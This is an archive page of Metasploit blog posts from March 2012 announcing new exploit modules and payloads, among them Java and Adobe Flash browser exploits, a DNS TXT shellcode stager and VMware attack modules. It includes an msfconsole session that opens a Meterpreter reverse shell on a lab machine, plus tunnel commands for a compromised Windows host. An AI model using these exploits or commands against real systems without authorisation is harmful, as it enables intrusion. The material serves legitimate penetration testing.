Skip navigation
All Places > Metasploit > Blog > 2012 > March
2012

Recently, Microsoft published a blog post regarding a Java exploit that's being used in the wild.  The vulnerability is more of a logical flaw that results in unsafe operations, which allows any attacker to run arbitrary code under the context of the user.  You may see the blog here:

http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sa ndbox-breach-cve-2012-0507.aspx

 

About two days ago, Metasploit obtained a partial sample of that malware thanks to an anonymous contributor.  Frequent Metasploit contributor Juan Vazquez and I then embarked on a 24 hour codeathon to produce a working module, committed to the tree moments ago:

 

Screen shot 2012-03-29 at 8.58.41 AM.png

 

Like Microsoft suggested, the exploit should be very reliable across different systems.  In the above screenshot, we tested the exploit against different platforms from Windows XP, Windows 7, all the way to Ubuntu and OSX.  As long as your target has the vulnerable version of Java, this exploit should get you shells.

 

To have a play with this and all our other fun exploits, download the free Metasploit Community Edition here. We'll be hosting a webcast on April 25th to discuss this and other Java security concerns. Save the date and watch this space for more info!

This week we've got a nifty new shellcode delivery scheme, we've normalized on Exploit-DB serial numbers, and a pile of new modules, so if you don't have Metasploit yet, you can snag it here.

 

DNS Payloads in TXT Records

 

To quote RFC 1464 describing DNS TXT records, "it would be useful to take advantage of the widespread use and scalability of the DNS to store information that has not been previously defined." I don't know about you, but to me, that sounds like a description for a universal shellcode delivery system. For this week's update, that's exactly what Peter "corelanc0d3r" Van Eeckhoutte has provided. Provided your target can make DNS queries against a domain you control, you can shuttle your alpha-encoded payload into an unwary DMZ or internal network.

 

The techniques for smuggling arbitrary data over DNS have been discussed for a little while now  -- for example, Ty Miller proposed using rDNS to deliver shellcode as part of a client exploit back in 2008. Corelanc0d3r's payload stager makes things tons easier for pen-testers who would like to highlight this particular exposure. As with most of his updates, corelanc0d3r's payload itself makes heavy use of comment documentation, so I encourage you to check it out if you'd like to learn the details.

 

Also, in a related line of research, open source contributor Chris John Riley has provided a Rex library port of Samuel Tesla's Base32 encoder. While there isn't anything in the source tree that yet uses it, the astute reader can see where this is going. Thanks both to CJR and corelanc0der for some great work!

 

New EDB References edb-screen.png

 

Today, we have over 130 modules in Metasploit that reference an Exploit-DB proof of concept exploit. These guys do some great work at archiving publicly available exploit code, and Exploit-DB has grown into a super-useful public resource for exploit writers and security researchers alike. So, as of this update, it's now much easier to search for exploits based on their Exploit-DB serial number.

 

As seen in the screenshot, searching for "EDB-18280" brings up three Metasploit modules that reference that particular Telnet exploit, and "search EDB-18280" in msfconsole returns an equivalent list. For module developers, this can be a quick way to tell if a) a Metasploit module exists for that PoC yet, and if so, b) how Metasploit's implementation differs from the public PoC.

 

Additional Modules

 

As to be expected, we also have a smattering of new modules for this week's update.

 

  • hp_data_protector_cmd, by c4an, wireghoul, and sinn3r, exploits CVE-2011-0923 for HP Data Protector.
  • manageengine_traversal, by sinn3r, exploits OSVDB-80262 for ManageEngine DeviceExpert.
  • freepbx_callmenum, by muts and Martin Tschirsich, exploits EDB-18649 for FreePBX.
  • ms10_002_ie_object, by sinn3r and Juan Vazquez, exploits MS10-002 for Internet Explorer.
  • ricoh_dl_bof, by sinn3r, exploits OSVDB-79691 on Richo DC's DL-10.
  • ultravnc_viewer_bof, by noperand, exploits CVE-2008-0610 for UltraVNC.
  • enum_airport, by sinn3r, is a post module which collects data from a target's a local Airport preferences.
  • enum_chicken_vnc_profile, by sinn3r, is a post module which collects a target's "Chicken of the VNC" profile.

 

Availability

 

If you're new to Metaspoit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

This post details some of the tools used in my recent IPv6 security testing webcast If you have any specific questions, please open a Discussion thread.

 

A minimal IPv6 toolbox:

 

The BackTrack Linux distribution includes these tools by default and is a great choice.

 

On your local Linux distribution, the following tools are useful:

  • ping6
  • tracepath6
  • socat
  • ip6tables
  • tcpdump
  • wireshark

 

Scanning your local subnet for all IPv6-enabled systems in one shot:

# nmap -6 --script=targets-ipv6-multicast-*

 

Port scanning the top 10000 ports on these assets:

# nmap -6 --script=targets-ipv6-multicast-* --script-args=newtargets -PS --top-ports=10000

 

Targeting a link-local address from within Metasploit (assuming the NIC is eth0):

msf exploit > set RHOST fe80::7aac:c2ff:fe3d:e003%eth0


Targeting all IP addresses (IPv4 and IPv6) tied to a hostname via DNS with a Scanner module:

msf scanner> set RHOSTS my.host.name

 

If you would like a global IPv6 address, these free services can tunnel over IPv4:

 

Bringing up a tunnel via Hurricane Electric's TunnelBroker service is simple:

 

Linux

 

ifconfig sit0 up

ifconfig sit0 inet6 tunnel ::<TunnelBrokerGateway>

ifconfig sit1 up

ifconfig sit1 inet6 add <TunnelBrokerPrefix>::2/64

route -A inet6 add ::/0 dev sit1

 


Bringing up a tunnel via TunnelBroker on a compromised Windows target:

 

Windows 2000/XP


ipv6 install

ipv6 rtu ::/0 2/::<TunnelBrokerGateway> pub

ipv6 adu 2/<TunnelBrokerPrefix>::2

 

Windows Vista/2008/7


netsh interface teredo set state disabled

netsh interface ipv6 add v6v4tunnel IP6Tunnel <TargetExternalIP> <TunnelBrokerGateway>

netsh interface ipv6 add address IP6Tunnel <TunnelBrokerPrefix>::2

netsh interface ipv6 add route ::/0 IP6Tunnel <TunnelBrokerPrefix>::1



For information on malicious Teredo configuration on Windows, please see this fine article.


Remember to configure a firewall (ip6tables or Windows FW) in either case

 


-HD

After a couple of relatively light weeks (blame SXSW, I guess), this week's update has quite a few neat new additions. As always, if you don't already have Metasploit, what are you waiting for? For the rest of us, here's what's new.

 

Importapalooza

 

This week's update has support for importing asset lists exported from Spiceworks, courtesy of Rapid7's Brandon Perry. Spiceworks is a free asset management application used by tons of IT pros and IT amateurs alike, and Metasploit can now take the Spiceworks small and medium business folks -- specifically, the results of the "Spiceworks Inventory Summary CSV export" and turn that into a target list of IP addresses. This brings the total number of supported import formats Metasploit can handle to 23 (including libpcap, nmap XML, Nessus, Qualys, Nexpose of course, and a pile of others).

 

More interestingly, I believe it's the first non-security-centric asset management format we cover. If you have a favorite asset management tool that produces some kind of parsable report (XML, CSV, or whatever), we'd love to see a sample of the output, or even better, a pull request to handle the format along with your sample.

 

Apple Filing Protocol

 

Community contributor Gregory Man added support for the Apple Filing Protocol (AFP) this week, in support of his afp_login module, adding to the parade of authentication protocols that Metasploit supports. While AFP is a relatively simple protocol in the scheme of things (it's small, nicely documented, and common), actually implementing any new wire protocol in pure Ruby is no small task. Thanks a ton for that, Gregory!

 

BSOD_MS12-020.pngThe MS12-020 RDP "Exploit"

 

This week, there was some small amount of buzz over at over at ThreatPost around Wei "sinn3r" Chen's addition of the denial-of-service module ms12_020_maxchannelids. Various Metasploit contributors and other security researchers got together over the weekend on Freenode IRC to see if they couldn't put together a proper exploit for the vulnerability patched by MS12-020 based on publicly-available information. This module is certainly not the end of that story -- it's somewhere in the middle, really. It does exercise the vulnerability, though, and crashes the target with a bluescreen, so defenders can use this module to get an idea of what to look for when either detecting a "real" exploit, and exploit writers can refer to it for guidance in case they missed the IRC pow-wow.

 

On the right, you see a screenshot of a BSOD when this vulnerability is exploited. If one of your server bluescreens detailing RDPWD.SYS, you may be under attack by a Terminal Services mischief maker.

 

New HTTP Downloader Payload

 

Finally, this week we've committed Peter "corelanc0d3r" Van Eeckhoutte's new HTTP downloader payload, windows/download_exec_https. The name is a little misleading, though, because it supports HTTP, HTTPS, and FTP protocols, as it uses the native InternetConnectA functionality in Microsoft's standard wininit.dll, and that guy handles all three.

 

It seems to work pretty well on all the platforms we tested, so if you're already using windows/download_exec to deliver executables to exploited targets, you might want to give this one a shot. The option syntax is identical, so it should just be a matter of swapping out one for the other. The module itself is at much better documented internally than the old download_exec standby, so it's a little less mysterious as to what's going on. Thanks for all the work on this, corelandc0d3r!

 

Additional New Modules

 

  • netdecision_traversal, by sinn3r, exploits OSVDB-79863 found in NetDecision's NOCVision Server.
  • netdecision_http_bof, by sinn3r, exploits OSVDB-79651 found in NetDecision's HTTP service.
  • sockso_traversal, by sinn3r, exploits BID-52509 in Sockso's Music Host Server.
  • dell_webcam_crazytalk, by sinn3r, exploits OSVDB-80205 in Dell's WebCam CrazyTalk ActiveX control.
  • rails_mass_assignment, by Gregory Mann, exploits a the mass-assignment Rails configuration error recently discussed on GitHub.
  • enum_protections, by ohdae, details the security software installed an a target Linux machine.
  • enum_adium, by sinn3r, interrogates the Mac OSX's built-in chat client Adium for account info and chat logs.

 

In addition, some post modules were shuffled and recombined to more immediately useful for end users -- most of this work was by ohdae and sinn3r:

 

  • enum_system combines the functionality previously a part of enum_cron, enum_services, enum_packages, as well as some of the functions in enum_linux
  • The rest of enum_linux was broken out into the post modules enum_configs, enum_network, enum_users_history

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

It's another Metasploit update, and it's headed straight for us!

 

Session Smarts

 

This week, Metasploit session management got a whole lot smarter. Here's the scenario: As a penetration tester, you rook a bunch of people into clicking on your browser-embedded Flash exploit, sit back, and watch the sessions rolling in. However, they're all behind a single NAT point, so all your sessions appear to be terminating at a single IP address, and you quickly lose track of who's who in your session list.

 

Over the last couple weeks, Rapid7's own HD Moore and James "egypt" Lee have solved that problem by giving Meterpreter sessions the smarts to figure out that the IP address they were delivered to isn't the same as the IP address they ended up on by comparing the local interface address with what it thought it was headed to. So, the end result is, if you've got sessions behind a NAT or something similar, you can now at least tell the difference between end points that are otherwise cloaked by NAT. Here's an example of a local attacker (192.168.168.10) connected to a remote victim (10.1.1.101) who is behind a NAT gateway (192.168.168.13):

 

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type               Information                       Connection
  --  ----               -----------                       ----------
  6   meterpreter win32  SITTINGDUCK\darkwing @ WEBSPHERE  192.168.168.10:9999 -> 192.168.168.13:26641 (10.1.1.101)

msf exploit(handler) > hosts

Hosts
=====

address         mac  name       os_name            os_flavor    os_sp  purpose   info  comments
-------         ---  ----       -------            ---------    -----  -------   ----  --------
10.1.1.101           WEBSPHERE  Microsoft Windows  .NET Server  SP2    client          
192.168.168.13                                                         firewall        

msf exploit(handler) > 

 

GitHub Care and Feeding

 

These last couple weeks have been dedicated to cleaning up a lot of our own internal processes around GitHub. For starters, we've been clearing out a lot of the older framework fixes that have been lingering in the queue, and by the end of the week, we should be in a pretty good spot as far as backlog is concerned. Going forward, I have sworn a blood oath to keep that backlog down to week's worth of pull requests.

 

Module management hasn't been too much trouble, seeing how Wei "sinn3r" Chen is an android from the future who can process community modules at insane speeds. Integrating the more complex framework patches, plugins, and other non-module contributions have been a little slower than I'd like in this post-Redmine world, and the longer those get put off, the harder it is to merge them in. By this time next week, you shouldn't see any outstanding pull requests more than a couple days old.

 

Speaking of Redmine, we're also just about ready to move our issue tracking over to GitHub. Right now, if Metasploit users run into a bug or have a feature request, we are still using the old dev.metasploit.com bug tracker, and that means users need to log in over there, too, which is kind of a hassle. We'd rather have one unified place to track issues and patches together (for obvious reasons), so look for the Redmine tracker to go away Real Soon Now.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes

.

iStock_000012586505XSmall.jpgYou may remember the awesome Metasploit T-shirt contest we ran in April of last year. We received a ton of submissions at the time and selected a winning T-shirt, designed by Danny Chrastil.

 

It was a long and arduous journey for us to get the T-shirts printed and to get the back-end systems up and running for the Metasploit Swag Store...but it's finally here. Yes, you'll notice that the T-shirt design is a little bit different than last year, but we're confident it'll look just as good on you as the previous one.

 

Those of you who've been eagerly awaiting the Metasploit store launch will be glad to hear that @egypt made me use the office chair on the right until the Metasploit Swag Store was up...I have a high tolerance for pain.You can imagine that I'm extremely happy to report that it is now available. Big thanks to the supporting team at Rapid7 to make this happen!

 

To get started, we're testing out the new store with three items; we'll add more products and designs if many of you decide to swipe your credit cards. We are happy to announce that a portion of the profits from the store will go to one of Rapid7's favorite non-profit organizations, Hackers for Charity. Here's what's we've got on the shelves for you:

 

Tshirt_large_2.jpgTshirt_large_3.jpg

Metasploit T-Shirt "Hex Code"

Designed by Danny Chrastil, this is the winner of the Metasploit T-shirt competition.

  • Front: the hex code from "msfpayload osx/ppc/ shell_reverse_tcp" in the background of the Metasploit logo.
  • Back: The Metasploit magic pwning power cow
  • Fabric: Hanes Adult Tagless Short-Sleeve Beefy-T®; preshrunk 100% ring-spun cotton; 6.1-oz.; high-stitch-density fabric
  • Lay-flat collar; shoulder-to-shoulder taping; double-needle cover-seamed neck; double needle sleeves and bottom hems

Hat_large_1.jpg

Metasploit Baseball Hat

Wear your allegiance to Metasploit on your forehead

  • Color: Black
  • 6-panel baseball hat with embroidered Metasploit logo on the front
  • Low profile 6 panel structured cap
  • Lightweight brushed cotton twill
  • Fabric strap with two piece velcro
  • Fabric weight 6 oz.

 

Bag_large_2.jpgBag_large_1.jpg

Metasploit Solar Computer Backpack

Finally a good reason to spend more time in the sun (watch video)

  • Fits laptops up to 14"
  • USB adapter, USB charger, AC charger
  • 3600 MAH battery and multiple adapters for charging iPod, iPhone, Blackberry and most other smartphones
  • Front has solar panel, zippered pocket with multi-function accessories organizer
  • Large main compartment
  • Viewpoint System computer sleeve with detachment buckle and clear window
  • 1600 denier ballistic / 420 denier honeycomb, embroidered with Metasploit logo

 

 

Now's your chance to win a Metasploit T-shirt. Simply tweet the following sentence before March 30th to enter:

 

Twitter icon Need some new threads? Get your geek on at the new Metasploit Store: http://bit.ly/hw3CUT #metasploitswag


Don't let that stop you from ordering your shirt now. If you win, we'll refund you the money!

 

If you want to check out the goods, visit the new Metasploit Swag Store!

I have to admit, parsing a URI is tricky.  Most Metasploit modules try to do it with some kind of crazy custom regex-fu, but unfortunately most of them are kind of buggy.  Because of this, I've committed a new patch to HttpClient -- a target_uri function that can automatically parse the URI for you. It's only a 4-line change, but should change the way we code HTTP-related modules.

 

Before I demonstrate how you can take advantage of target_uri, I should briefly explain why you should avoid doing this manually.  First off, the URI structure looks like this:

 

SchemeHierarchical URI indicatorCredentialHostPortPath to resourceQuery stringFragment

 

  • Scheme: A string that indicates the protocol, such as: http, https, smb, ftp, etc.
  • Hierarchical URL indicator: Optional. A string of "//".
  • Credential: Optional. In this format: username:password@
  • Host: An address to the server (note this can be IPv4, IPv6, 32-bit integer, etc)
  • Port: Optional. This is pretty self-explanatory.
  • Path To Resource: A directory or file path.  This is trickier than you think, because how do you determine if "test" is a directory, or file?  Keep in mind that when you do "set TARGETURI test" in a browser exploit in Metasploit, 'test' is treated as a directory, not file.
  • Query String: Optional. Pretty much anything that comes after "?".
  • Fragment: Optional. Pretty much anything that comes after "#".

 

RFC-3986 covers the generic URI syntax pretty well in case you'd like to read up more, but as you can see, it's really a lot of hassle to break it down.  To ease off this process, we came up with a simple solution by using Ruby's stdlib -- or to be specific, the URI module. The following is a basic usage example:

 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
          super(update_info(info,
              'Name'          => 'URI test case',
              'Description'    => %q{This module tests the target_uri function},
              'Author'        => [ 'sinn3r' ],
              'License'        => MSF_LICENSE
          ))

          register_options(
          [
              # You must use TARGETURI, or target_uri won't work
              OptString.new('TARGETURI', [true, 'The URI Path', '/cms/index.php?page=1&cmd=id'])
          ], self.class)
    end

    def run
          uri = target_uri
          print_status(uri.inspect)
    end
end


 

The above example should return something like this:

 

msf  auxiliary(test_case) > run

[*] #<URI::Generic:0x0000010c8c05e8 URL:/cms/index.php?page=1&cmd=id>

 

To retrieve just the resource path, you can simply do this (note: If there's no path, you will get a nil, so make sure you handle that properly. Same thing goes to scheme, port, query, fragment, etc):

 

uri = target_uri
print_status(uri.path)  #We get "/cms/index.php"


 

If you want the query string (or a specific parameter), here's another trick on how to handle it:

 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanUniqueQuery

    def initialize(info = {})
          super(update_info(info,
              'Name'          => 'URI test case',
              'Description'    => %q{This module tests the target_uri function},
              'Author'        => [ 'sinn3r' ],
              'License'        => MSF_LICENSE
          ))

          register_options(
          [
              #You must use TARGETURI, or target_uri won't work
              OptString.new('TARGETURI', [true, 'The URI Path', '/cms/index.php?page=1&cmd=id'])
          ], self.class)
    end

    def run
          uri = target_uri
          query = queryparse(uri.query || "")
          param_page = query['page']
          param_cmd  = query['cmd']

          print_status("Query is a #{query.class}")
          print_status("Page is: #{param_page}")
          print_status("CMD is : #{param_cmd}")
    end
end


 

And this gives us the following output:

 

msf  auxiliary(testme) > rerun

[*] Reloading module...

 

[*] Query is a Hash

[*] Page is: 1

[*] CMD is : id

[*] Auxiliary module execution completed

 

And that's it for now. In case you're interested in other HttpClient functions, please feel free to check out the following documentation:

http://dev.metasploit.com/documents/api/

In addition to the nuclear-powered exploit, we've got a new slew of updates, fixes and modules this week for Metasploit, so let's jump right into the highlights for this update.

 

Updated WMAP Plugin

 

Longtime community contributor Efrain Torres provided a much-anticipated update to the Wmap plugin. Wmap automates up a bunch of web-based Metasploit modules via the Metasploit console, from HTTP version scanning to file path bruteforcing to blind SQL injection testing. If you're not already familiar with Wmap, feel free to download the latest Metasploit installer and give it a whirl against Metasploitable or your preferred test environment. It's pretty exhaustive stuff, so for more details on what all you can do with Wmap, Read the Fine Material here.

 

Msfconsole Searching

 

We've also picked up a set of patches from contributor RageLtMan to make searching from the console interface a lot easier. By using the -S (note the capital) option for the "hosts", "services", "vulns", "creds", "notes", and "loot" commands, users can now pass a search term to filter the result set on. This makes working in the console directly somewhat easier to manage when you have several hosts with several services in your penetration testing target list. For example, by simply passing "services -S dropbear" you will display only those services that mention the DropBear SSH service. Pretty handy, so thanks for that, RageLtMan!

 

New Modules

 

As to be expected, this update comes with a passel of new and exciting exploits, auxiliary modules, and even a new payload.

 

  • afp_server_info, an auxiliary module from Gregory Man, interrogates Apple Filing Protocol (AFP) servers for banner information by parsing out the initial encoded responses.
  • mongodb_login, also from Gregory, bruteforces MongoDB services on the off chance it has a user and password configured -- it usually isn't.
  • asus_net4switch_ipswcom exploits OSVDB-79438, a vulnerability in the ASUS Net4Switch ActiveX control (by sinn3r)
  • djstudio_pls_bof exploits CVE-2009-4656, a file format vulnerability in DJ Studio Pro (by Sebastien Duguette and Death-Shadow-Dark)
  • ibm_pcm_ws exploits CVE-2012-0201, a file format vulnerability in IBM's Personal Communications iSeries (by TecR0c, with surprisingly thorough description documentation, so thanks TecRoc!)
  • sysax_ssh_username, a remote, pre-authentication exploit for OSVDB-79689 in Sysax SSH server for Windows (by sinn3r).
  • vlc_realtext, a file format vulnerability in VLC Media player (by Juan Vazquez). The original vulnerability was discovered by Tobias Klein, author of A Bug Hunter's Diary, but this is not the VLC vulnerability discussed in that book -- this one was from a couple months prior, so might add a little more context to BHD.
  • apple_ios_backup, by HD Moore and bannedit, is a post module which snags sensitive data from a an iOS backup. This was previously a Windows-only post module, but has been upgraded to operate on OSX targets as well.

 

In addition to these, we're shipping a new payload for ARM-based Linux systems, shell_bind_tcp (by civ and hal), which opens a listening TCP port using native ARM shellcode. I got a chance to use a pwnie express to test it out, which is a totally fun device to mess around with. The shellcode works like a champ, so that whole testing experience was pretty fun and enlightening.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Over the last couple days, Metasploit's own Wei "sinn3r" Chen and community contributor Juan Vazquez put together an exploit for CVE-2012-0754, which targets a vulnerability in Adobe's Flash player: adobe_flash_mp4_cprt. This the same vulnerability exploited by the recent "Iran's Oil and Nuclear Situation.doc" e-mail attack campaign spotted by Contagio on March 5. After getting a hold of the reported malware from an anonymous contributor, sinn3r and Juan were able to determine what exactly triggers the Adobe Flash bug, and thus, were able to put together a more general-purpose exploit and incorporate it into Metasploit.

 

Today, we have a full Internet Explorer-based exploit, operational against IE 6, 7, and 8, covering pretty much all modern and not-so-modern Windows XP and Microsoft Vista clients. In other words, this exploit provides an excellent opportunity to test out your organization's protections against fresh threats targeting a slightly out-of-date client base.

 

This is all significant because this Flash vulnerability has been publicly disclosed for only about three weeks, and it's unusual to see something like this show up so quickly in a live, untargeted e-mail attack campaign.

 

In addition, while the original exploit was strictly a Microsoft Word document based exploit (which itself was merely a downloader for the "real" payload), the Metasploit version is a proper browser-based exploit, and its usage is about as simple as it gets (detailed below). The moral of the story is, thanks to a working version of a Metasploit exploit for this relatively fresh vulnerability, security reserachers, AV/IPS vendors, and IT administrators alike can take a look at the vulnerability and make the assessment if they and their constituency are adequately protected. Hooray for open source security research!

 

Usage Example

 

$ msfconsole

msf > use windows/browser/adobe_flash_mp4_cprt

msf exploit(adobe_flash_mp4_cprt) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(adobe_flash_mp4_cprt) > exploit

[*] Started reverse handler on 10.0.1.3:4444

[*] Using URL: http://0.0.0.0:8080/2Q0m2Zpti8wu

[*]  Local IP: http://10.0.1.3:8080/2Q0m2Zpti8wu

[*] Server started.

[*] 10.0.1.4:1797 Client requesting: /2Q0m2Zpti8wu

[*] Using msvcrt ROP

[*] 10.0.1.4:1797 /2Q0m2Zpti8wu/Exploit.swf

[*] Sending html to 10.0.1.4:1797...

[*] 10.0.1.4:1797 Client requesting: /2Q0m2Zpti8wu/Exploit.swf

[*] 10.0.1.4:1797 Sending Exploit SWF...

[*] 10.0.1.4:1797 Client requesting: /test.mp4

[*] 10.0.1.4:1797 Sending MP4...

[*] Sending stage (752128 bytes) to 10.0.1.4

[*] Meterpreter session 1 opened (10.0.1.3:4444 -> 10.0.1.4:1798)

 

msf  exploit(adobe_flash_mp4_cprt) > sessions

 

Active sessions

===============

 

  Id  Type                  Information  Connection

  --  ----                  -----------  ----------

  1  meterpreter x86/win32  XP\lab @ XP  10.0.1.3:4444 -> 10.0.1.4:1798 (10.0.1.4)

 

 

Patch Availability

 

Information regarding patch availability from Adobe can be found in their security bulletin, APSB12-03, and of course, end users are encouraged to apply appropriate patches as soon as it's convenient to do so.

 

Exploit Availability

 

This module will be part of this week's update (which is getting finished up as I wrote), and will be available (along with 800 other exploits) from the usual Metasploit download page. Of course, it's also already in the source tree, so if you're the bleeding-edge sort that already has Metasploit, it's just an msfupdate away.

IPv6 Infographic.pngWhat's your company doing to prepare for IPv6? Probably not an awful lot. While 10% of the world's top websites now offer IPv6 services, most companies haven't formulated an IPv6 strategy for the network. However, the issue is that most devices you have rolled out in the past 5 years have been IPv6-ready, if not IPv6-enabled. Windows 7 and Windows Server 2008 actually use IPv6 link-local addresses by default. Also think about all the other clients, servers, appliances, routers, and mobile devices you've added to your network in recent years. If you’re honest, how do you know that your network is not vulnerable to IPv6 attacks right now?

 

That's why even if you haven't set up an IPv6 network internally yet, you should test for IPv6 vulnerabilities. Here are some common security issues that you may find:

 

  • Misconfiguration: Not actively planning for IPv6 can introduce dangerous misconfiguration, such as a firewall that has filters set up for IPv4 traffic but accepts all IPv6 traffic. One organization we audited left zone transfers on their DNS server open for IPv6, but blocked for IPv4
  • Uneven features: Many systems vendors are having to retrofit IPv6 into their products. Because Rome wasn't built in a day, IPv6 features often lag behind for a while. This uneven feature support for IPv6 can lead to security issues.
  • No IPv6 defenses: Some defense mechanisms, such as older IPS systems, may simply be blind to IPv6 traffic, letting it pass through without scrutiny.

 

Metasploit can now conduct penetration tests on IPv6 networks to uncover these security issues, enabling you to find these issues:

 

screenshot_102.png

 

The new IPv6 support is now available in all current editions of Metasploit - download your latest copy now. Security researchers working on IPv6 vulnerabilities can now submit a Metasploit exploit or auxiliary module for use by the security community through Github.

 

If you're interested in more in-depth information, HD Moore is offering a free training on IPv6 security on March 28. Register now to get it on your calendar!

If you are doing security assessments, you are probably running into virtual servers every day. According to analyst firm Gartner, 80% of companies now have a virtualization project or program. With the recent 4.2 release of Metasploit, your next penetration test should be much more fun. For example, Metasploit now flags ESX Servers as virtual hosts in the user interface:

 

vm_icon.png

 

If you are managing virtual servers, you may have come across the VMware vSphere Web Services SDK. It's a powerful way to manage virtual machines on ESX/ESXi and vCenter Server systems, with a documentation that rivals the New York phone book (if it still exists as a printed version). Like most self-respecting APIs, it requires you to authenticate with a username and password. This password may be the lynchpin of your virtual data security. In other words, you may be well advised to audit that the passwords for this API are not found in Average Joe's common password list.

 

In the recent 4.2 release, Metasploit has added a new module that brute forces passwords for the VMware vSphere Web Services API, plus a few modules that enable penetration testers to have fun with the virtual data center. The most simple modules enable you to shut down a critical server or spin up a virtual machine that's laid dormant for months - and is probably crawling with vulnerabilities you can attack. You can also collect screenshots from all guest systems, which will come in handy for your security assessment report.

 

Systems running VMware virtualization technology, including ESX Server and VMware Workstation, also have a service called VMauthD, which enables authentication through the OS's local user credentials. Metasploit now includes a brute force module for VMAuthD authentication, which provides an alternative service to obtain system credentials. If an ESX server is integrated with the Windows Active Directory, the enum_users module will even generate a list of all users and groups on the domain, which is fantastic for reconnaissance.

 

Here's a list of all the fun modules you can throw at your virtualized data center directly from Metasploit:

 

Metasploit ModuleDescription

auxiliary/admin/vmware/poweroff_vm

This module will log into the Web API of VMware and try to power off a specified Virtual Machine.

auxiliary/admin/vmware/poweron_vm

This module will log into the Web API of VMware and try to power on a specified Virtual Machine.
auxiliary/admin/vmware/tag_vm

This module will log into the Web API of VMware and 'tag' a specified Virtual Machine. It does this by logging a user event with user supplied text

auxiliary/admin/vmware/terminate_esx_sessionsThis module will log into the Web API of VMware and try to terminate user login sessions as specified by the session keys.
post/multi/gather/find_vmxThis module will attempt to find any VMware virtual machines stored on the target.
auxiliary/scanner/vmware/esx_fingerprintThis module accesses the web API interfaces for VMware ESX/ESXi servers and attempts to identify version information for that server.
auxiliary/scanner/vmware/vmauthd_loginThis module will test vmauthd logins on a range of machines and report successful logins.
auxiliary/scanner/vmware/vmware_enum_permissionsThis module will log into the Web API of VMware and try to enumerate all the user/group permissions. Unlike enum suers this is only users and groups that specifically have permissions defined within the VMware product
auxiliary/scanner/vmware/vmware_enum_sessionsThis module will log into the Web API of VMware and try to enumerate all the login sessions.
auxiliary/scanner/vmware/vmware_enum_usersThis module will log into the Web API of VMware and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.
auxiliary/scanner/vmware/vmware_enum_vms

This module attempts to discover virtual machines on any VMware instance running the web interface. This would include ESX/ESXi and VMware Server.

auxiliary/scanner/vmware/vmware_host_detailsThis module attempts to enumerate information about the host systems through the VMWare web API. This can include information about the hardware installed on the host machine.
auxiliary/scanner/vmware/vmware_http_loginThis module attempts to authenticate to the VMware HTTP service for VMware Server, ESX, and ESXi
auxiliary/scanner/vmware/vmware_screenshot_stealerThis module uses supplied login credentials to connect to VMware via the web interface. It then searches through the data stores looking for screenshots. It will download any screenshots it finds and save them as loot.

 

In addition to the VMware modules, we've also added a post-exploitation module for VirtualBox, called post/multi/gather/enum_vbox. This module will attempt to enumerate any VirtualBox VMs on the target machine. Due to the nature of VirtualBox, this module can only enumerate VMs registered for the current user, therefore, this module needs to be invoked from a user context.

 

If you would like to hear more about pentesting virtual environments, sign up for our free webcast with David Maloney from the Metasploit engineering team who developed most of the new virtual pwning goodness.

This is a pretty modest update, since it's the first after our successful 4.2 release last week. Now that 4.2 is out the door, we've been picking up on core framework development, and of course, have a few new modules shipping out.

 

Meterpreter Updates

 

James "egyp7" Lee and community contributor mm__ have been banging on the POSIX side of Meterpreter development this week, and have a couple of significant enhancements to Linux Meterpreter. The most significant change is switching to netlink sockets for discovering network interfaces -- previously, Meterpreter used libpcap, which had a couple of downsides. The first is that libpcap doesn't show interfaces that you cannot sniff on. This, in turn, leads to an even bigger issue: you can't sniff at all unless you're root on most machines, so normal users usually don't see any interfaces at all. During the transition, mm__ also added support for listing IPv6 addresses, and egyp7 is working on having Windows meterpreter doing the same thing soon.

 

Since egyp7 is back to full-time framework development work (he's been away during a penetration testing stint), expect to see more advances in core framework functionality in the coming weeks.

 

New Modules

 

While the module count this week isn't quite as impressive as some of the giant piles of exploits we've pushed out in the past, it's interesting to note that of the five new modules we're shipping this week, each one addresses a different exploitation vector.

 

  • lantronix_telnet_version parses out the banner infomation for a Lantronix Telnet Service (by TheLightCosine), making for a classic information disclosure -- why bother with fancy fingerprinting techniques when the service will just tell attackers exactly what version it is?
  • orbit_download_failed_bof exploits CVE-2008-1602, a file format vulnerability in Orbit Downloader (by Juan Vazquez). By enticing a user to open an Orbit Downloader "metalink" formatted file, the attacker can trigger an access violation and seize the execution path.
  • hp_data_protector_cmd_exec exploits CVE-2011-0923, which is a remote unauthenticated command exec vulnerability in HP's Data Protector product (by wireghoul and c4an).
  • java_ws_vmargs exploits CVE-2012-0500, which is another command execution vuln; this time, on the client, via a specially-crafted JNLP file (by jduck). Note that this exploit uses a crafty WebDAV vector to get the goods to the victim, which is pretty cool. Watch your egress rules!
